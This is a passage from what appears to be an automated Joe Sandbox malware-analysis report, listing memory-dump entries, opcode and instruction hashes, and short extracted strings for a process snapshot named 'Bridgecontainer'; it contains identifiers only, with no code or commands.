                  • Instruction Fuzzy Hash: 48329C31D1DA8A8FEB99EB6888597B9BBB1FF15340F0800BAD009D71D2DB386944CB55
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ccf66f4051654e249c715c637621f1693088f8f50fe271909175679fce2f1a02
                  • Instruction ID: f24bcf738bf70d4df050cb91ab594e0e194cb4ce9c282ce64f6db9139d6c53c2
                  • Opcode Fuzzy Hash: ccf66f4051654e249c715c637621f1693088f8f50fe271909175679fce2f1a02
                  • Instruction Fuzzy Hash: F0025A31D1965A8FEB98EB68C8557B9BBB1FF19341F0401BAD00ED32D2CB386984CB55
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ecfedaf83eb4bc8ea2b4781a55a619309e916fe5b0900725f0c062fd5e5da3f
                  • Instruction ID: add3e47b0af12d7fefc111807d05c86ce1e656e8fab7e80bc7102a4806448ee9
                  • Opcode Fuzzy Hash: 8ecfedaf83eb4bc8ea2b4781a55a619309e916fe5b0900725f0c062fd5e5da3f
                  • Instruction Fuzzy Hash: 39B19C3090D68E8FEB99EF2898696BA7BF0FF19340F1045BAD409C71D2DB3AA544C745
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c85d3b1b4301a7fed8949f7db5f680ba0598bd2c9a48dfcf30be5eb6ea8ee0c
                  • Instruction ID: 8253c42bb5b22ba4d9492ac25da0dc0491dd3df8ff03411231cad2f77c8e26f2
                  • Opcode Fuzzy Hash: 9c85d3b1b4301a7fed8949f7db5f680ba0598bd2c9a48dfcf30be5eb6ea8ee0c
                  • Instruction Fuzzy Hash: A6A1AB3090D68E8FEB95FB64C8596BA7BF0FF59341F0005BAD809C7192DB3AA584CB45
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID: 0Y_H$B$M$Y$e$g$k$}
                  • API String ID: 0-1278765890
                  • Opcode ID: c86183d4c2b0df508e555f543e519caea26607ba3295ce55e4348099377c281c
                  • Instruction ID: 6fa77d9c2e6006af4e7389b4ad6bafafec252f24c4db1525de0ca0d7738ff1da
                  • Opcode Fuzzy Hash: c86183d4c2b0df508e555f543e519caea26607ba3295ce55e4348099377c281c
                  • Instruction Fuzzy Hash: E0D1C370D18A698FDBA8EF18C8957AAB7B1FB58341F1041EAD40DE3291DF356E818F44
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID: ;$F$N
                  • API String ID: 0-723008160
                  • Opcode ID: 9d6612cbce6c3d905e5c98b0c1d6c02ffc4daa26b85bc43577167e823f2d9ddb
                  • Instruction ID: ea2edfc4216749897b2d16dffa27e27763c08bbcde5ff59e88b6ca679783bddc
                  • Opcode Fuzzy Hash: 9d6612cbce6c3d905e5c98b0c1d6c02ffc4daa26b85bc43577167e823f2d9ddb
                  • Instruction Fuzzy Hash: 8D518070D086298FEBA4EF28C8547E9B6F1BF58351F5001EAD44DA7291CB789E84DF05
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID: H$H
                  • API String ID: 0-136785262
                  • Opcode ID: 611532c8da8b441bd22ac164ac765a1fffafc52c6cf7a753727fe7e6997866c4
                  • Instruction ID: d573a427197cd658c9ca25a8d03458effb39738da59aa7556625ac56def8b7b0
                  • Opcode Fuzzy Hash: 611532c8da8b441bd22ac164ac765a1fffafc52c6cf7a753727fe7e6997866c4
                  • Instruction Fuzzy Hash: 8181D371D0D96A4EE798FB289805BA9B7B1FF94350F4002BAC40DD71D2DE386D858B44
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID: P$}
                  • API String ID: 0-1285626757
                  • Opcode ID: dd3767b03ba641125c9284d00cb9d2b9d8f1cb9d9bcd6e57c4c39f01e809c28f
                  • Instruction ID: ac35c4a140e7dddd8d5ef9e73efa325215cca9f8cc82850ab03e92b0b35461a7
                  • Opcode Fuzzy Hash: dd3767b03ba641125c9284d00cb9d2b9d8f1cb9d9bcd6e57c4c39f01e809c28f
                  • Instruction Fuzzy Hash: BC11B370D0862A8FEB68EF14C895BADB7B1FB54341F1441EAD00DA62D1DB386E84DF44
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID: XyH
                  • API String ID: 0-3434043539
                  • Opcode ID: f0b226f5ee2bb6657dbe1356c93f3a99af7bf926f586411dd7fa6b63893d1c19
                  • Instruction ID: e13571519dbc3222bf41fe86d8811e455ee7b90667cca2bd080b079d7d11b5ec
                  • Opcode Fuzzy Hash: f0b226f5ee2bb6657dbe1356c93f3a99af7bf926f586411dd7fa6b63893d1c19
                  • Instruction Fuzzy Hash: 6131D530D0CA9E4FEB99EB2898196B9BBE0FF59341F04147ED409D71C2EF285884C755
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID: XyH
                  • API String ID: 0-3434043539
                  • Opcode ID: c9f5dc008fc6303cdc0a78032fe509ba5c35c865c0f7f2e263d4bb69b02428fa
                  • Instruction ID: 0961b4171db9cbf0698f321609bf6b0ee6977a12e3663912e6d819c51fae4603
                  • Opcode Fuzzy Hash: c9f5dc008fc6303cdc0a78032fe509ba5c35c865c0f7f2e263d4bb69b02428fa
                  • Instruction Fuzzy Hash: C3319E31D0C99A8FEB89EB28D8156FE77A1FF99350F04107AD009DB1D2DB25A844C790
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID: vH
                  • API String ID: 0-2844672238
                  • Opcode ID: 8cf3b0ed9a9af723b6faee3578ca0f63bac8d971e4c857f37ddb753a2d879ab0
                  • Instruction ID: c160f28f0cbc85648f7c20fc44a6b77cf0c52d04ae4eb51a26362682bec0d397
                  • Opcode Fuzzy Hash: 8cf3b0ed9a9af723b6faee3578ca0f63bac8d971e4c857f37ddb753a2d879ab0
                  • Instruction Fuzzy Hash: FA116A31D0C95E9EE780FB68D8492B97BE0FFA8381F4405B6D809C6192EF38A9448700
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 326521440f937f2a901d197756f3bd081fcb2031181d04075d1e9dcf452b8f96
                  • Instruction ID: 3b61bef82932d945d8d2c05442725b3370b714c9477def1b3f47dd8b3704e71f
                  • Opcode Fuzzy Hash: 326521440f937f2a901d197756f3bd081fcb2031181d04075d1e9dcf452b8f96
                  • Instruction Fuzzy Hash: 7AE1BB30D0D69E8FEB95EB68A8192FA7BB0FF15350F0401BAD448D21D2EF3D69488B55
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ef3f84f6b2e28a7dd1ea195f88ee67a70cefcf469422faed9aa3c0fcb01d1d10
                  • Instruction ID: 7cfb842ca9a52839006df4319ac17db6019ccdf34703f4fe36f184536eb9260d
                  • Opcode Fuzzy Hash: ef3f84f6b2e28a7dd1ea195f88ee67a70cefcf469422faed9aa3c0fcb01d1d10
                  • Instruction Fuzzy Hash: FAE15830D2D64E8FEB55EB68C8586EDBBE0FF19341F0844BAD409D7192EB38A944CB05
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f44cfa017b4092aa77fb21f3f6e9dbf5f7e1d063033d0ef6c98df348086d958f
                  • Instruction ID: d54bd45c66f47b62644025c64f837983c258b66429caf58f9a76d0641c1ad44e
                  • Opcode Fuzzy Hash: f44cfa017b4092aa77fb21f3f6e9dbf5f7e1d063033d0ef6c98df348086d958f
                  • Instruction Fuzzy Hash: D4D1573091DA4D8FEB95EB6888596FDBBB1FF19340F4401BAD409D72D2EB38A944CB44
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 73017ef461b6115910b6f9972e0c0181fa015e1e6e27ae54c0bea7c654b93820
                  • Instruction ID: aea61a45456f555f6eacb27fda380d4774452b48cc9ea581d76a23cea790592b
                  • Opcode Fuzzy Hash: 73017ef461b6115910b6f9972e0c0181fa015e1e6e27ae54c0bea7c654b93820
                  • Instruction Fuzzy Hash: 00D17A30D1D68A8FE742FBA888596B9BBE0FF19341F0505BAD409C71E2EB38A944C755
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 996375de058040fea7f3f39090513ba88f80cd1596a625a2dcba2141c365548c
                  • Instruction ID: 2296b1c23a18adc0397da0c26bdf50637842984faf74d05251422f224207aaa4
                  • Opcode Fuzzy Hash: 996375de058040fea7f3f39090513ba88f80cd1596a625a2dcba2141c365548c
                  • Instruction Fuzzy Hash: 8ED12931D1969A9FEB98EB68C8657B9BBB1FF15340F0400BAD00DD72D2DB386984CB45
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 75734e272ce370eae5a1c2062078ba4e8dbb392e6cdac68ccd1f7785c2830aed
                  • Instruction ID: 14c95011230a524ed55a103ef62702dd2c9b2a955d7da36eb0cdd3f169a4bac4
                  • Opcode Fuzzy Hash: 75734e272ce370eae5a1c2062078ba4e8dbb392e6cdac68ccd1f7785c2830aed
                  • Instruction Fuzzy Hash: 34B1EF31A0DB8A8FDB59EF2888652BA7BE1FF95340F0405BED449C71D2DB28AC85C745
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4307967a14f73225eb5bb5b7f5e20cfb8153a075963b5ca4f32eb054b5f5a6f8
                  • Instruction ID: 94a64e4bcb62c74adb73c28da482451b90aec65bcbb31f3869eccea3177cd6de
                  • Opcode Fuzzy Hash: 4307967a14f73225eb5bb5b7f5e20cfb8153a075963b5ca4f32eb054b5f5a6f8
                  • Instruction Fuzzy Hash: 02C1C130A1CA8A8FDB59EF2888596BA7BE1FF99340F1445BED409C71D2DF34A881C745
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2939d4bdb43d7ff41b710166f4a261868904c2ea94beaa989ed883a7cf78cc2a
                  • Instruction ID: 7a5040304c1ee3c1bd764877e402947be76c4df7df05246615bffc1300673400
                  • Opcode Fuzzy Hash: 2939d4bdb43d7ff41b710166f4a261868904c2ea94beaa989ed883a7cf78cc2a
                  • Instruction Fuzzy Hash: E2C13A71D19A5A9FEB98EB68C8657B8B7B1FF19341F0400BAD00DD72D2CB386984CB45
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 40c32000be2c7749e79fff53ed9c89c0e29b504d8c1ab1065d9785d351d36597
                  • Instruction ID: 84a1fe055b15a0fe0bbb9c7cf3a3ef4fc44be1b050c59af39e3d526380fd807f
                  • Opcode Fuzzy Hash: 40c32000be2c7749e79fff53ed9c89c0e29b504d8c1ab1065d9785d351d36597
                  • Instruction Fuzzy Hash: 90B18B3091D64E8FEBA5EF28D8596BA7BF0FF18341F0005BAD809D7192EB39A554CB44
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 926bc27651af2b7bdeaf52626157fd4304faf65693d4794d6794ea6de1c60a38
                  • Instruction ID: e97131a7e8f5971fdb58b2f98a1680b88f5c398cb09c4d69ea78e415e6dacadb
                  • Opcode Fuzzy Hash: 926bc27651af2b7bdeaf52626157fd4304faf65693d4794d6794ea6de1c60a38
                  • Instruction Fuzzy Hash: 50C14730E1961D8FEB50EBA8D8597AEB7B1FF08300F1041BAD409E7292DF396985CB55
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 301f8ab91444e1723dc82b02b021052b693333e71f6b6aa64d63da03d56fdfe7
                  • Instruction ID: 29b5a4158c61bcd9fa558570629a477ef9ebba45e76a7502b4e9d59c8b038701
                  • Opcode Fuzzy Hash: 301f8ab91444e1723dc82b02b021052b693333e71f6b6aa64d63da03d56fdfe7
                  • Instruction Fuzzy Hash: 9EC13830E1961D8FEB44EBA8D8597AEB7B1FF48300F1041BAD009E7292DF396985CB55
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 41657df748299e2a5bf6debe75920dacbccbd24174edbe420efe70d67c1e87c2
                  • Instruction ID: 5034daf674d2bb9354801a043c4e95e096d2b72b5dc6790cd6422ffc6bfc5fc1
                  • Opcode Fuzzy Hash: 41657df748299e2a5bf6debe75920dacbccbd24174edbe420efe70d67c1e87c2
                  • Instruction Fuzzy Hash: 44B14A30D1DA9E8FEB95EB6888592FDBBB0FF19340F4401BAD409D71D2EB3869448B45
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f4fbf9d4634e8bc7d53bf962f7098e6c0b1f9315169a444eb3a1e78108a19718
                  • Instruction ID: 6da2fc51ea2c56019d4d83805e2b81a53909f2dd303f5f475360a804dce60332
                  • Opcode Fuzzy Hash: f4fbf9d4634e8bc7d53bf962f7098e6c0b1f9315169a444eb3a1e78108a19718
                  • Instruction Fuzzy Hash: A2A11F31D0C69A8FEBA9EBA488556BCB7A1FF46380F0401BAD40DD72D2DF386C458B54
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 818e874e12128aa1e2afa906c28c247052d0f7766102b6e512c8e5bf24fefef6
                  • Instruction ID: f4f0b4d4436ca7a92c9708522f3830e6656c479c3207ee545b2f41f3a53566a3
                  • Opcode Fuzzy Hash: 818e874e12128aa1e2afa906c28c247052d0f7766102b6e512c8e5bf24fefef6
                  • Instruction Fuzzy Hash: 5EB12931D19A5A9FEB98EB68D8557B8B7B1FF58340F0400B9D00EE32D6CB386984CB05
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a99ab4094b2894d5dc6256c780bf9b81232807f3d46bf01f949140877332d434
                  • Instruction ID: 110750001644badc35a8fef05b89cac228135f3617dd93e04bdd64b877fc2aac
                  • Opcode Fuzzy Hash: a99ab4094b2894d5dc6256c780bf9b81232807f3d46bf01f949140877332d434
                  • Instruction Fuzzy Hash: 1CA14A30D1DA5E8FEB94EB6888596FDBBB1FF59340F4401BAD409D32D2EB3869448B44
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d13970c4f0c350d4aa96bc1578a6e16c48d1f445092c665a809964f2f6c5a0b
                  • Instruction ID: a7f0385c844868ec08fbfe6ce7efb80b5f2ea530ec9f8f516830b1e0cd1e1b3d
                  • Opcode Fuzzy Hash: 3d13970c4f0c350d4aa96bc1578a6e16c48d1f445092c665a809964f2f6c5a0b
                  • Instruction Fuzzy Hash: 6481BC31A1CA498FDB98EF1C98556A977E2FF99740F1445BAE44EC32C2CF24AC42C785
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d1f5cb2e93226bbb65cb2d0c21168aec5abf45ecfc61738773ec0732c7f1662d
                  • Instruction ID: cedb13a5153cfabc3b668b0065c27530ad5bc07eea6693fd16d4e5e74186848d
                  • Opcode Fuzzy Hash: d1f5cb2e93226bbb65cb2d0c21168aec5abf45ecfc61738773ec0732c7f1662d
                  • Instruction Fuzzy Hash: 7A91AF3191D68E8FEBA5EF28D8192FA7BF0FF15341F0405BAD808C2192EB79A554CB45
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e81b822d2f6cd5c3a21bfa4b30f7f3d1f0367df14b95fc0a5a1f23a0183b90a
                  • Instruction ID: 5710f31fb29d72a4b1c80d65f66ce1c097ae2b398494cac66eb957f78c647b80
                  • Opcode Fuzzy Hash: 6e81b822d2f6cd5c3a21bfa4b30f7f3d1f0367df14b95fc0a5a1f23a0183b90a
                  • Instruction Fuzzy Hash: 85A17C34E1960D8FEB44EB68D859AAEBBF1FF58300F10017AD009D7292EF39A941CB44
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 92316d58170262bf5a6851239b0255cb27866384679ba892f4cd842e65c06b6d
                  • Instruction ID: 3efd85d06071746b68bae51042c94f9583ef2cba5d123fc0cc36589e57a89515
                  • Opcode Fuzzy Hash: 92316d58170262bf5a6851239b0255cb27866384679ba892f4cd842e65c06b6d
                  • Instruction Fuzzy Hash: 29A16730D0D6898FEB55EBA8C8996EDBBF0EF59340F1441BAD049D72D2DB38A944CB14
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ef6774b416d3fcbf7022785d85423798e8756629fc1df793ad4272040e994234
                  • Instruction ID: 1050b0217eb2d3b1b40c9ed047973de36ee3cb609d59e6d07b8224974885f4cc
                  • Opcode Fuzzy Hash: ef6774b416d3fcbf7022785d85423798e8756629fc1df793ad4272040e994234
                  • Instruction Fuzzy Hash: 66A17C30D1D68E8FEB95EF6498692BA7BB0FF19301F1404BBD819C6192EB396544CB41
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d6c562628badb9c078e1059a231e73e23e5be03efc6365e486d1e54e103c7c4f
                  • Instruction ID: b2f3a00dfdcf79e22d1486f169bba6a808a0237f1c56d51d6814a5398d3fe8ca
                  • Opcode Fuzzy Hash: d6c562628badb9c078e1059a231e73e23e5be03efc6365e486d1e54e103c7c4f
                  • Instruction Fuzzy Hash: 76819D3091DA4E8FEB91FB2898596FABBF0FF19340F0408BAD409C7092EB39A544C755
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 838458351e5826f2a7913d7588715a20efd7a6a99fa961accf7e19ac576336a5
                  • Instruction ID: 1aef5c7090e7136530940995f3a44ecbdc3a5c801eb5ba5fbbc41fb43482eb6d
                  • Opcode Fuzzy Hash: 838458351e5826f2a7913d7588715a20efd7a6a99fa961accf7e19ac576336a5
                  • Instruction Fuzzy Hash: 0C81BF30A1CA8A8FDB59EF2888555BA77E1FF99340F1445BED449C32C2DB34AC82C785
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: efc4904fc8631f91bf3e43d49eed4dfdff2bd7f095c6634044f679de1f274adc
                  • Instruction ID: 1cd73fde8fdb7f82d9cb531f2123e42020e44454d9048d26fb672d8f8b4fae85
                  • Opcode Fuzzy Hash: efc4904fc8631f91bf3e43d49eed4dfdff2bd7f095c6634044f679de1f274adc
                  • Instruction Fuzzy Hash: 6461AD31A0CA8A8FDB49EF1888555BA77E2FF98340F14457ED44AC32C2CB35AC82C785
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e9696c8393357e84aa91a3f55c1f52751b5288b88f74b09a0a03fefec4a25b8
                  • Instruction ID: 02ab9fad270274cd89334770720b6be173070ffb654314f8e6a73ea0d31909d1
                  • Opcode Fuzzy Hash: 1e9696c8393357e84aa91a3f55c1f52751b5288b88f74b09a0a03fefec4a25b8
                  • Instruction Fuzzy Hash: A8619C30A1CA8A8FDB49EF1888555BA77A2FF98344F14457ED44AC7282CB34AC82C785
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c6e68a711239f18784b6a2e6857193f7220ea77c6f63ca0c3f4124637c4c8be9
                  • Instruction ID: 88c71a9d8a5c3d37e9ea9c4ddefd7e8976a5a54dc74fb19f0ee0938aacd30886
                  • Opcode Fuzzy Hash: c6e68a711239f18784b6a2e6857193f7220ea77c6f63ca0c3f4124637c4c8be9
                  • Instruction Fuzzy Hash: DC71AC3090DA8A8FEB95EB2498682F97BE0FF19350F2405BAC409C71D2DB79A544CB49
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3db16ae50bc0f3e6bce63735342eb753b4c31879be54a764640b9c2eb2843e32
                  • Instruction ID: 458091ec2badf9d41b740ab4a87c17cfd968df600a89535c419221f78266c909
                  • Opcode Fuzzy Hash: 3db16ae50bc0f3e6bce63735342eb753b4c31879be54a764640b9c2eb2843e32
                  • Instruction Fuzzy Hash: 2871C370D1C91E8FEBA4EBA8E495ABDB7B1EF58340F50017AD40DE32C1CB3569818B58
